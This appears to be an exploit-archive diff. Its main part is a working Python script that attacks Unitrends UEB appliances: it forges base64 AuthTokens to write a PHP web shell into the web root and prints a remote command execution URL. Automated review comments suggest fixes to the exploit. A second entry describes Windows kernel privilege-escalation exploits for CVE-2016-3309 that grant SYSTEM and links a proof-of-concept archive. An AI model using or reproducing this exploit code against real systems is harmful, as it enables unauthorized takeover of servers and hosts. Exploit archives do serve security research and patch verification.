|
||||
|
||||
# Parse command line args:
|
||||
usage = "Usage: %prog -r <appliance_ip> -u <username> -p <password>\n"\
|
||||
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
|
||||
help="Target host w/ UNITRENDS UEB installation")
|
||||
parser.add_option("-u", '--username', dest='username', action="store",
|
||||
help="User with any amount of privilege on unitrends device")
|
||||
parser.add_option("-p", '--password', dest='password', action="store",
|
||||
help="password for this user")
|
||||
|
||||
(options, args) = parser.parse_args()
|
||||
|
||||
if not options.rhost:
|
||||
parser.error("[!] No remote host specified.\n")
|
||||
|
||||
elif options.rhost is None or options.username is None or options.password is None:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
RHOST = options.rhost
|
||||
username = options.username
|
||||
password = options.password
|
||||
|
||||
################################################################
|
||||
# REQUEST ONE: GET A UUID.
|
||||
################################################################
|
||||
|
||||
url1 = '/api/login'
|
||||
|
||||
a = {"username" : username,
|
||||
"password" : password}
|
||||
|
||||
post_body = json.dumps(a)
|
||||
|
||||
headers1 = {'Host' : RHOST}
|
||||
|
||||
print "[+] Attempting to log in to {0}, {1}:{2}".format(RHOST, username, password)
|
||||
|
||||
conn = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn.set_debuglevel(0)
|
||||
conn.request("POST", url1, post_body, headers=headers1)
|
||||
r1 = conn.getresponse()
|
||||
|
||||
################################################################
|
||||
# BUILD THE AUTH TOKENS THAT WE'LL USE IN AN ATTACK.
|
||||
################################################################
|
||||
|
||||
parsed_json = json.loads(r1.read())
|
||||
|
||||
if 'auth_token' not in parsed_json:
|
||||
print "[!] Didn't receive an auth token. Bad creds?"
|
||||
exit()
|
||||
|
||||
auth_encoded = parsed_json['auth_token']
|
||||
auth_decoded = base64.b64decode(auth_encoded)
|
||||
|
||||
uuid = auth_decoded.split(':')[1]
|
||||
ssid = auth_decoded.split(':')[2]
|
||||
|
||||
# We'll place our command shell in /var/www/html/tempPDF, since apache
|
||||
# has rw in this dir.
|
||||
|
||||
log_dir = "/var/www/html/tempPDF/"
|
||||
log_file = ''.join(random.choice(string.ascii_lowercase) for _ in range(5)) + '.php'
|
||||
log_lvl = "5"
|
||||
shell = "<?php echo shell_exec($_GET['cmd']);?> >"
|
||||
|
||||
auth_mod1 = "v0:{0}:{1}:{2}{3}:{4}".format(uuid, ssid, log_dir, log_file, log_lvl)
|
||||
auth_mod2 = "v0:{0}:{1}:{2}{3}:{4}".format(shell, ssid, log_dir, log_file, log_lvl)
|
||||
|
||||
auth_mod1 = base64.b64encode(auth_mod1)
|
||||
auth_mod2 = base64.b64encode(auth_mod2)
|
||||
|
||||
url2 = '/api/summary/current/'
|
||||
|
||||
################################################################
|
||||
# REQUEST 2: PUT A FILE
|
||||
################################################################
|
||||
|
||||
print "[+] Making a request to place log to http://{0}/tempPDF/{1}".format(RHOST, log_file)
|
||||
|
||||
headers2 = {'Host' : RHOST,
|
||||
'AuthToken' : auth_mod1}
|
||||
|
||||
# touch the file
|
||||
conn.request("GET", url2, headers=headers2)
|
||||
r2 = conn.getresponse()
|
||||
|
||||
print "[+] Making request to reflect shell_exec php to {0}.".format(log_file)
|
||||
|
||||
headers3 = {'Host' : RHOST,
|
||||
'AuthToken' : auth_mod2}
|
||||
|
||||
# make the first command
|
||||
time.sleep(.5)
|
||||
conn.request("GET", url2, headers=headers3)
|
||||
conn.close()
|
||||
|
||||
# optional cleanup time
|
||||
|
||||
print "[+] Making a request to generate clean shell_exec at http://{0}/tempPDF/shell.php".format(RHOST)
|
||||
|
||||
url4 = '/tempPDF/' + log_file
|
||||
url4 += '?cmd=echo+-e+"<?php%20echo%20shell_exec(\$_GET[%27cmd%27]);?>"+>+shell.php'
|
||||
|
||||
conn1 = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn1.request("GET", url4, headers=headers2)
|
||||
r3 = conn1.getresponse()
|
||||
conn1.close()
|
||||
|
||||
|
||||
url5 = "/tempPDF/shell.php"
|
||||
print "[+] Checking for presence of http://{0}{1}".format(RHOST, url5)
|
||||
headers3 = {'Host' : RHOST}
|
||||
|
||||
conn2 = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn2.request("GET", url5, headers=headers2)
|
||||
r3 = conn2.getresponse()
|
||||
|
||||
if r3.status == 200:
|
||||
print "[+] Got a 200 back. We did it."
|
||||
print "[+] Example cmd: http://{0}{1}?cmd=id".format(RHOST, url5)
|
||||
else:
|
||||
print "Got a {0} back. Maybe this didn't work.".format(r3.status)
|
||||
print "Try RCE here http://{0}/tempPDF/{1}?cmd=id".format(RHOST, log_file)
|
||||
|
||||
conn2.close()
|
||||
|
||||
# 3. Solution:
|
||||
# Update to Unitrends UEB 10
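Review bot: `headers3` is defined twice, and the second definition (`headers3 = {'Host' : RHOST}`, just before the `conn2` request) is never used because `conn2.request` sends `headers2`; `r3` is likewise overwritten before it is read. As written the "checking for presence" step is sent with the modified AuthToken rather than as the plain request the unused header set suggests was intended; either pass `headers3` there or remove it. The response `r2` from the file-touch request is never read before `conn` is reused; read and discard it so an unread body cannot desynchronize the keep-alive connection. Typos in the banner: "Session tokens looks like", "shell_exec on liner".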
platforms/win_x86-64/local/42960.txt (executable file, 17 lines added)
@ -0,0 +1,17 @@
|
|||
Sources:
|
||||
https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html
|
||||
https://github.com/siberas/CVE-2016-3309_Reloaded
|
||||
|
||||
Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on the affected system. The exploits should work fine on Windows 10 x64 with Creators Update, build 15063.540 (latest version of Win10 before the release of Microsoft's September Updates).
|
||||
|
||||
The Visual Studio solution contains three exploits:
|
||||
|
||||
CVE-2016-3309_Reloaded_Bitmaps: Exploit using the Bitmaps technique
|
||||
CVE-2016-3309_Reloaded_Palettes: Exploit using the Palettes technique
|
||||
CVE-2016-3309_Reloaded_Deadlock: POC exploit showcasing the system deadlock which happens due to improved Handle validation
|
||||
|
||||
We also published a blog post (https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html) which goes into detail about the exploitation of this "wild" Pool-based overflow.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42960.zip
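Review bot: the siberas blog URL is listed twice, under "Sources:" and again in the final paragraph; one reference is enough. The text calls the win32kfull!bFill bug "recently-patched" and mentions the "September Updates" but never names the bulletin, KB or CVE identifier of the fix, so a reader cannot tell which patch level closes it; state the identifier alongside the tested build (15063.540). It would also help to say which of the three listed projects the zip in the "Proof of Concept" link contains, since the description refers to a Visual Studio solution rather than a single file.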